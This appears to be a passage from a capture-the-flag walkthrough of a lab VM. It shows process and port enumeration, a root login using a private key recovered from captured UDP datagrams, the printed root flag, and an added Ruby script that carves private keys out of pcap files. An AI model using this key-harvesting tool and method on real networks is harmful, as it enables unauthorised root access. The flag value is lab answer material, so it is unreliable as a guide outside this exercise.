jackie       987  0.0  0.5   8512  5136 pts/0    Ss   03:31   0:00 -bash
root        1207  0.1  0.0      0     0 ?        I    03:40   0:02 [kworker/0:0-events]
root       12269  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/0:1-ata_sff]
root       12270  0.0  0.0      0     0 ?        I    03:56   0:00 [kworker/u2:0-flush-8:0]
root       12344  0.0  0.0      0     0 ?        I    04:01   0:00 [kworker/0:2-ata_sff]
root       12350  0.0  0.0   5368   500 ?        Ss   04:01   0:00 /bin/sleep 10
jackie     12351  0.0  0.3   9760  3244 pts/0    R+   04:01   0:00 ps auxww

Nothing here either, apart from that root-owned /bin/sleep 10 showing up again (PID 12350).

Check listening ports

jackie@factorspace:~$ ss -tulnp
Netid       State        Recv-Q       Send-Q             Local Address:Port             Peer Address:Port       Process       
udp         UNCONN       0            0                        0.0.0.0:68                    0.0.0.0:*                        
tcp         LISTEN       0            128                      0.0.0.0:22                    0.0.0.0:*                        
tcp         LISTEN       0            511                            *:80                          *:*                        
tcp         LISTEN       0            128                         [::]:22                       [::]:*   

Ugh. Nothing at all.

Out of options, I peeked at a writeup: in theirs, ss -tulnp shows an extra UDP socket. Why don't I have it? Rebooted the box, still nothing. Damn.

Possibly my target and Kali sit on different network adapters.

Anyway, the rest of the path: capture the UDP traffic from 192.168.56.138 in Wireshark; one of the datagrams carries a private key, and SSH as root with that key gives root. Worth remembering: ss only lists sockets that exist at the instant it runs, and a sender that opens a socket, fires one datagram and closes it again is bound for milliseconds, so a packet capture, not ss, is the reliable way to find this kind of thing.

┌──(root㉿kali2)-[~/Desktop]
└─# cat id        
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

┌──(root㉿kali2)-[~/Desktop]
└─# ssh root@192.168.56.138 -i id
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 30 04:39:10 2024 from 192.168.56.104
root@factorspace:~# whoami
root
root@factorspace:~# cat /root/r*
052cf26a6e7e33790391c0d869e2e40c
root@factorspace:~# 
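The page does not show how the key was pulled out of the capture, so here is an added Ruby example (mine, not from the original post) that does it offline: it parses a classic pcap, keeps the UDP payloads sent by the target in capture order, and cuts out any PEM private-key block. Assumptions: the capture is classic pcap on Ethernet, for instance tcpdump -ni eth0 -w udp.pcap udp and host 192.168.56.138 run on Kali (interface name assumed; Wireshark saves pcapng by default, so pick the pcap format when saving), the key may arrive split over several datagrams, and the embedded key material is a constructed placeholder, not a real key.

```ruby
require 'stringio'

# Walk a classic libpcap file (Ethernet link type) and return every IPv4/UDP
# datagram as [src_ip, dst_ip, src_port, dst_port, payload], in capture order.
def udp_datagrams(pcap)
  io = StringIO.new(pcap)
  e = case io.read(4).unpack1('L<')
      when 0xa1b2c3d4 then '<'          # little-endian writer (the common case)
      when 0xd4c3b2a1 then '>'          # big-endian writer
      else raise ArgumentError, 'not a classic pcap file (pcapng is not handled)'
      end
  _maj, _min, _tz, _sig, _snap, linktype = io.read(20).unpack("S#{e}S#{e}l#{e}L#{e}L#{e}L#{e}")
  raise ArgumentError, "unsupported link type #{linktype}, expected Ethernet (1)" unless linktype == 1

  out = []
  while (rec = io.read(16)) && rec.bytesize == 16
    _sec, _usec, incl_len, _orig_len = rec.unpack("L#{e}L#{e}L#{e}L#{e}")
    frame = io.read(incl_len)
    break if frame.nil? || frame.bytesize < incl_len
    next unless frame.bytesize >= 42 && frame[12, 2].unpack1('n') == 0x0800  # IPv4 only
    ip  = frame[14..-1]
    ihl = (ip.getbyte(0) & 0x0f) * 4
    next unless ip.getbyte(9) == 17 && ip.bytesize >= ihl + 8                # UDP only
    src = ip[12, 4].unpack('C4').join('.')
    dst = ip[16, 4].unpack('C4').join('.')
    sport, dport, ulen = ip[ihl, 6].unpack('nnn')
    payload = ip[ihl + 8, [ulen - 8, 0].max] || ''.b
    out << [src, dst, sport, dport, payload]
  end
  out
end

PEM_KEY = /-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----\n?/m

# Join the payloads sent by `host` in order (the key may be split over several
# datagrams) and cut out every PEM private-key block found in the stream.
def private_keys_from(pcap, host)
  stream = udp_datagrams(pcap).select { |src, *| src == host }.map(&:last).join
  stream.scan(PEM_KEY)
end

# ---- constructed test input ------------------------------------------------
# Build a minimal little-endian pcap from [src, dst, sport, dport, payload]
# rows; IP and UDP checksums are left at zero, which the parser never checks.
def build_pcap(rows)
  pcap = [0xa1b2c3d4, 2, 4, 0, 0, 65535, 1].pack('L<S<S<l<L<L<L<')
  rows.each_with_index do |(src, dst, sport, dport, payload), i|
    payload = payload.b
    udp = [sport, dport, 8 + payload.bytesize, 0].pack('nnnn') + payload
    ip  = [0x45, 0, 20 + udp.bytesize, 0, 0, 64, 17, 0].pack('CCnnnCCn') +
          src.split('.').map(&:to_i).pack('C4') +
          dst.split('.').map(&:to_i).pack('C4') + udp
    frame = ("\x00".b * 12) + [0x0800].pack('n') + ip
    pcap << [i, 0, frame.bytesize, frame.bytesize].pack('L<L<L<L<') << frame
  end
  pcap
end

FAKE_KEY = "-----BEGIN OPENSSH PRIVATE KEY-----\n" \
           "bm90IGEgcmVhbCBrZXksIGp1c3QgY29uc3RydWN0ZWQgdGVzdCBkYXRhCg==\n" \
           "-----END OPENSSH PRIVATE KEY-----\n"   # placeholder, not a real key

def sample_capture
  target = '192.168.56.138'
  chunks = FAKE_KEY.scan(/.{1,40}/m)    # pretend the sender splits it into 40-byte datagrams
  rows = chunks.map { |c| [target, '192.168.56.255', 41234, 5555, c] }
  rows.insert(1, ['192.168.56.1', '192.168.56.255', 137, 137, 'unrelated chatter'])  # noise
  build_pcap(rows)
end

if __FILE__ == $PROGRAM_NAME && ARGV[0]
  pcap = File.binread(ARGV[0])
  private_keys_from(pcap, ARGV[1] || '192.168.56.138').each_with_index do |key, i|
    File.write("id_#{i}", key, perm: 0600)   # ssh refuses keys that are group/world readable
    puts "wrote id_#{i} (#{key.bytesize} bytes)"
  end
end
```

Run it as ruby keyfromudp.rb udp.pcap 192.168.56.138 and it writes id_0 with mode 600, ready for ssh -i; without arguments it only defines the functions and the constructed sample. If the capture was saved as pcapng, convert it first (editcap -F pcap in.pcapng out.pcap) or the parser will refuse it.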
